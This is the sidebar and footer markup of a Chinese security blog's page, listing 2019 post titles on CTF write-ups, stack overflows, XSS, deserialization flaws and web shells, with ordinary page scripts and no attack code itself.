class="post-list-link" href="/2019/03/24/C编写实现Linux反弹shell/">C编写实现Linux反弹shell</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/23/花式栈溢出之Stack-smash/">花式栈溢出之Stack smash</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/22/图片XSS小结/">图片XSS小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/21/Teaser-CONFidence-CTF-Web-writeup/">Teaser CONFidence CTF Web writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/17/SpEL注入之javacon/">SpEL注入之javacon</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/13/AeroCTF-writeupup之board-tracking-system/">AeroCTF writeupup之board tracking system</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/09/TAMUctf-Web-writeup/">TAMUctf Web writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/08/TAMUctf-Pwn-writeup/">TAMUctf Pwn writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/05/栈溢出之ret2libc/">栈溢出之ret2libc</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/栈溢出之ret2syscall/">栈溢出之ret2syscall</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/栈溢出之ret2shellcode/">栈溢出之ret2shellcode</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/ROP之ret2text/">ROP基础及栈溢出之ret2text</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/栈溢出基本原理/">栈溢出基本原理</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/栈及栈帧/">栈基础</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/24/CSP策略及绕过技巧小结/">CSP策略及绕过技巧小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/21/一道绕过CSP的XSS题目/">一道绕过CSP的XSS题目</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/19/一些加载XSS-Payload的标签/">一些加载XSS Payload的标签</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/16/个人XSS-payload收集/">个人XSS payload收集</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/15/XSS闯关之xss-haozi-me/">XSS闯关之xss.haozi.me</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/13/XML注入之DocumentBuilder/">XML注入之DocumentBuilder与XXE攻击防御</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/09/ELF安全防御机制小结/">ELF安全防御机制小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/06/Java反序列化漏洞/">Java反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/03/Java序列化和反序列化机制/">Java序列化和反序列化机制</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/01/Java动态代理机制/">Java动态代理机制</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/01/Java反射机制/">Java反射机制</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/31/PHP伪协议/">PHP伪协议</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/30/常见Web漏洞类型/">常见Web漏洞类型总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/28/IA-32寄存器/">IA-32（Intel Architecture 32位）寄存器</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/Sqli-labs-writeup/">Sqli-labs Less1-20</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/XMLDecoder反序列化漏洞/">Java XMLDecoder反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/SQL注入写WebShell方式小结/">SQL注入写WebShell方式小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/PHP反序列化漏洞/">PHP unserialize反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/PHP内存型木马/">PHP内存型木马</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/Windows下的一种PHP隐蔽后门姿势/">Windows下的一种PHP隐藏后门姿势</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/通过DVWA学习DOM型XSS/">DVWA之DOM型XSS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/Linux环境与相关工具/">Linux环境与相关工具</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/phar反序列化漏洞/">phar反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/PyYAML反序列化漏洞/">Python PyYAML反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/cPickle反序列化漏洞/">Python cPickle反序列化漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/HITB_Binary_100_writeup/">HITB Binary 100 writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/01/Python安全小工具之反编译pyc文件/">Python安全小工具之反编译pyc文件</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019 Mi1k7ea
            </div>
            <div class="footer-right">
                Welcome to M1ik7ea's blog <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit" title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 4;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>